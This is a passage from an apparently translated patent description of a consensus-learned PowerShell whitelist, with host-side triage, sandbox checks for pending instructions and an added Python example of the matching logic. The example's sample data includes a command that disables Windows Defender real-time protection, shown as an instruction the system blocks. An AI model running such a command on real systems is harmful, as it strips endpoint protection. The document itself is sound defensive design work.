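        print(name, sorted(members))
```

With threshold 1, a function counts as consensus only when at least two other hosts have also executed it, so `Invoke-WebRequest` (two hosts) and `Set-MpPreference` (one host) stay out of the security function set and any chain containing them stays out of the security call chain set. The threshold is the only knob here: set it too low and anything already common in the group is whitelisted, which is why the baseline collection must come from hosts believed clean at the time.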

In an embodiment, when the processor 502 implements the step of sending the powershell basic behavior white list to the host and, when the host detects that a new powershell instruction is added, having the host acquire the new powershell instruction information and match it against the powershell basic behavior white list to obtain the pending instruction set, the following steps are specifically implemented:

sending the powershell basic behavior white list to the host; when the host detects that a new powershell instruction is added, the host acquires the new powershell instruction information; the host screens out the instructions whose powershell function call chain in the new powershell instruction information belongs to the security function call chain set and whose powershell command in the new powershell instruction information belongs to the powershell commands corresponding to the elements of the security command set, to form security instructions, and releases the security instructions; the host screens out the instructions whose powershell command in the new powershell instruction information does not belong to the powershell commands corresponding to the elements of the security command set, to form unsafe instructions, blocks the unsafe instructions and alarms the related information; and the host screens out the instructions whose powershell function call chain in the new powershell instruction information does not belong to the elements of the security function call chain set but whose powershell command in the new powershell instruction information does belong to the powershell commands corresponding to the elements of the security command set, to form the pending instruction set.
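The host-side matching above is a three-way decision on each new instruction, and the sandbox verdict on the pending set is then turned into a per-host notice (the step described for the execution result). The following is an added example of both, not code from the patent or its applicant; the whitelist and the new instruction records are constructed, and the record layout (an id, the host code, the command text and the function call chain) is an assumption about what "instruction information" contains.

```python
"""Host-side matching of newly added PowerShell instructions against the
basic behaviour whitelist, and conversion of sandbox verdicts into notices.

Added example; the whitelist and instruction records are constructed.
"""
from typing import Dict, Iterable, List, Set, Tuple

CallChain = Tuple[str, ...]
Instruction = Dict[str, object]

# Constructed whitelist, standing in for the one the server distributes.
SAFE_COMMANDS: Set[str] = {
    "Get-Process | Where-Object CPU -gt 10",
    "Get-Service -Name Spooler",
}
SAFE_CALL_CHAINS: Set[CallChain] = {
    ("Get-Process",),
    ("Get-Service", "Get-Process"),
}

# Constructed "new powershell instruction information" from three hosts.
NEW_INSTRUCTIONS: List[Instruction] = [
    {"id": 1, "host_code": "h1",
     "command": "Get-Process | Where-Object CPU -gt 10",
     "call_chain": ("Get-Process",)},
    {"id": 2, "host_code": "h2",
     "command": "Set-MpPreference -DisableRealtimeMonitoring $true",
     "call_chain": ("Set-MpPreference",)},
    {"id": 3, "host_code": "h3",
     "command": "Get-Service -Name Spooler",
     "call_chain": ("Invoke-WebRequest", "Get-Service")},
]


def triage(ins: Instruction,
           safe_commands: Set[str] = SAFE_COMMANDS,
           safe_chains: Set[CallChain] = SAFE_CALL_CHAINS) -> str:
    """Apply the three host-side rules of the text, in order:
    command not in the security command set          -> "block" (and alarm)
    command and call chain both in the whitelist     -> "release"
    command known but call chain not in the whitelist -> "pending" (sandbox)
    """
    if ins["command"] not in safe_commands:
        return "block"
    if tuple(ins["call_chain"]) in safe_chains:
        return "release"
    return "pending"


def partition(instructions: Iterable[Instruction]) -> Dict[str, List[Instruction]]:
    """Split new instructions into the released, blocked and pending sets."""
    buckets: Dict[str, List[Instruction]] = {"release": [], "block": [], "pending": []}
    for ins in instructions:
        buckets[triage(ins)].append(ins)
    return buckets


def notices_from_sandbox(pending: List[Instruction],
                         verdicts: Dict[int, str]) -> List[Dict[str, object]]:
    """Turn each sandbox execution result ("abnormal" or "normal", keyed by
    instruction id) into the notice sent back to the originating host:
    a blocking notice plus alarm for abnormal, a release notice otherwise."""
    notices: List[Dict[str, object]] = []
    for ins in pending:
        verdict = verdicts[ins["id"]]
        notices.append({
            "host_code": ins["host_code"],
            "id": ins["id"],
            "action": "block" if verdict == "abnormal" else "release",
            "alarm": verdict == "abnormal",
        })
    return notices


if __name__ == "__main__":
    buckets = partition(NEW_INSTRUCTIONS)
    print({k: [i["id"] for i in v] for k, v in buckets.items()})
    # Constructed sandbox verdict for the single pending instruction.
    print(notices_from_sandbox(buckets["pending"], {3: "abnormal"}))
```

Note what reaches the sandbox: only an instruction whose command text is already in the security command set but whose call chain is new. A command string not in the set is blocked on the host without sandboxing, and the comparison is exact, so the quality of the security command set decides how often benign but unseen commands are blocked.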

In an embodiment, when implementing the step of blocking abnormal instructions and alarming the related information according to the execution result, and releasing non-abnormal instructions for execution, the processor 502 specifically implements the following steps:

when the execution result indicates that the corresponding instruction is an abnormal instruction, sending a blocking notice for the abnormal instruction to the host of that instruction according to the execution result, and alarming the related information; and when the execution result indicates that the corresponding instruction is a non-abnormal instruction, sending a release notice for the non-abnormal instruction to the host of that instruction according to the execution result, so that the host executes the non-abnormal instruction.

It should be understood that, in the embodiment of the present application, the processor 502 may be a Central Processing Unit (CPU), and the processor 502 may also be another general-purpose processor, a Digital Signal Processor (DSP), an Application Specific Integrated Circuit (ASIC), a Field-Programmable Gate Array (FPGA) or other programmable logic device, a discrete gate or transistor logic device, a discrete hardware component, or the like. A general-purpose processor may be a microprocessor, or the processor may be any conventional processor.

It will be understood by those skilled in the art that all or part of the flow of the method implementing the above embodiments may be implemented by a computer program instructing associated hardware. The computer program includes program instructions, and the computer program may be stored in a storage medium, which is a computer-readable storage medium. The program instructions are executed by at least one processor in the computer system to implement the flow steps of the embodiments of the method described above.

Accordingly, the present invention also provides a storage medium. The storage medium may be a computer-readable storage medium. The storage medium stores a computer program, wherein the computer program, when executed by a processor, causes the processor to perform the steps of:

acquiring a powershell calling mode set;

matching the powershell calling mode set with a powershell calling mode white list to obtain a legal calling mode set;

collecting powershell basic information;

performing powershell data analysis statistics according to the powershell basic information to perform consensus mechanism learning, so as to generate a consensus-based powershell basic behavior white list;

sending the powershell basic behavior white list to a host and, when the host detects that a new powershell instruction is added, having the host acquire the new powershell instruction information and match it against the powershell basic behavior white list to obtain a pending instruction set;

acquiring the pending instruction set;

placing the pending instruction set in a server sandbox for execution to obtain an execution result;

and, according to the execution result, blocking abnormal instructions and alarming the related information, and releasing non-abnormal instructions for execution.

The powershell basic information comprises the powershell basic information of each host in the host group, and the powershell basic information of each host comprises a host code, an executed powershell function data set, a powershell function call chain set and an executed powershell command set.

In an embodiment, when the processor executes the computer program to implement the step of matching the powershell calling mode set with a powershell calling mode white list to obtain a legal calling mode set, the following steps are specifically implemented:

screening out the elements of the powershell calling mode set that are consistent with the powershell calling mode white list, so as to obtain the legal calling mode set.

In an embodiment, when the processor executes the computer program to implement the step of performing powershell data analysis statistics according to the powershell basic information to perform consensus mechanism learning to generate a powershell basic behavior white list based on consensus, the following steps are specifically implemented:

performing consensus learning on all executed powershell function data sets in the host group to generate the complete, deduplicated powershell security function set of the host group, so as to obtain a security function set; performing consensus learning on all executed powershell command sets in the host group to generate the complete, deduplicated powershell security command set of the host group, so as to obtain a security command set; performing consensus learning on all powershell function call chain sets in the host group to generate the complete, deduplicated powershell security function call chain set of the host group, so as to obtain a security function call chain set;

the powershell basic behavior white list comprises a security function set, a security command set and a security function call chain set.

In an embodiment, when the processor executes the computer program to perform the step of performing consensus learning on all executed powershell function data sets in the host group to generate the complete, deduplicated powershell security function set of the host group and obtain the security function set, the following steps are specifically implemented:

for each host in the host group, comparing the executed powershell function data set of that host with the executed powershell function data sets of the other hosts in the host group, and counting, for each powershell function in the current host's executed powershell function data set, the number of other hosts' executed powershell function data sets in which it appears, so as to obtain a count set for each host; screening out the powershell functions whose elements in the count set of each host exceed a set frequency threshold, to form the powershell security function set of each host; integrating the powershell security function sets of all hosts to form the overall security function set; and deduplicating the elements of the overall security function set to obtain the security function set.

In an embodiment, when the processor executes the computer program to perform the step of performing consensus learning on all powershell function call chain sets in the host group to generate the complete, deduplicated powershell security function call chain set of the host group and obtain the security function call chain set, the following steps are specifically implemented:

screening out, from the powershell function call chain set of each host in the host group, the powershell function call chains that match the security function set, so as to obtain the security function call chain set of each host; integrating the security function call chain sets of all hosts to form the overall security function call chain set; and deduplicating the elements of the overall security function call chain set to obtain the security function call chain set.

In an embodiment, when the processor executes the computer program to implement the step of sending the powershell basic behavior white list to the host and, when the host detects that a new powershell instruction is added, having the host acquire the new powershell instruction information and match it against the powershell basic behavior white list to obtain the pending instruction set, the following steps are specifically implemented:

sending the powershell basic behavior white list to a host;

when the host detects that a new powershell instruction is added, the host acquires the new powershell instruction information; the host screens out the instructions whose powershell function call chain in the new powershell instruction information belongs to the security function call chain set and whose powershell command in the new powershell instruction information belongs to the powershell commands corresponding to the elements of the security command set, to form security instructions, and releases the security instructions; the host screens out the instructions whose powershell command in the new powershell instruction information does not belong to the powershell commands corresponding to the elements of the security command set, to form unsafe instructions, blocks the unsafe instructions and alarms the related information; and the host screens out the instructions whose powershell function call chain in the new powershell instruction information does not belong to the elements of the security function call chain set but whose powershell command in the new powershell instruction information does belong to the powershell commands corresponding to the elements of the security command set, to form the pending instruction set.

In an embodiment, when the processor executes the computer program to implement the step of blocking abnormal instructions and alarming the related information according to the execution result, and releasing non-abnormal instructions for execution, the following steps are specifically implemented:

when the execution result indicates that the corresponding instruction is an abnormal instruction, sending a blocking notice for the abnormal instruction to the host of that instruction according to the execution result, and alarming the related information; and when the execution result indicates that the corresponding instruction is a non-abnormal instruction, sending a release notice for the non-abnormal instruction to the host of that instruction according to the execution result, so that the host executes the non-abnormal instruction.

The storage medium may be a USB disk, a removable hard disk, a Read-Only Memory (ROM), a magnetic disk, an optical disk, or any other computer-readable storage medium capable of storing program code.

Those of ordinary skill in the art will appreciate that the units and algorithm steps of the examples described in connection with the embodiments disclosed herein may be implemented in electronic hardware, computer software, or a combination of both; in the foregoing description the components and steps of the examples have been described in general in terms of their functionality in order to illustrate clearly the interchangeability of hardware and software. Whether such functionality is implemented as hardware or software depends on the particular application and the design constraints imposed on the implementation. Skilled artisans may implement the described functionality in different ways for each particular application, but such implementation decisions should not be interpreted as a departure from the scope of the present invention.

In the embodiments provided in the present invention, it should be understood that the disclosed apparatus and method may be implemented in other ways. For example, the above-described apparatus embodiments are merely illustrative. For example, the division of each unit is only one logic function division, and there may be another division manner in actual implementation. For example, various elements or components may be combined or may be integrated into another system, or some features may be omitted, or not implemented.

The steps of the method of the embodiment of the invention can be reordered, combined and deleted according to actual needs. The units of the device of the embodiment of the invention can be merged, divided and deleted according to actual needs. In addition, the functional units in the embodiments of the present invention may be integrated into one processing unit, each unit may exist alone physically, or two or more units may be integrated into one unit.

The integrated unit, if implemented in the form of a software functional unit and sold or used as a stand-alone product, may be stored in a storage medium. On this understanding, the technical solution of the present invention in essence, or the part of it that contributes to the prior art, or all or part of the technical solution, may be embodied in the form of a software product stored in a storage medium, which includes instructions for causing a computer device (which may be a personal computer, a terminal, or a network device) to execute all or part of the steps of the method according to the embodiments of the present invention.

While the invention has been described with reference to specific embodiments, the invention is not limited thereto, and various equivalent modifications and substitutions can be easily made by those skilled in the art within the technical scope of the invention. Therefore, the protection scope of the present invention shall be subject to the protection scope of the claims.
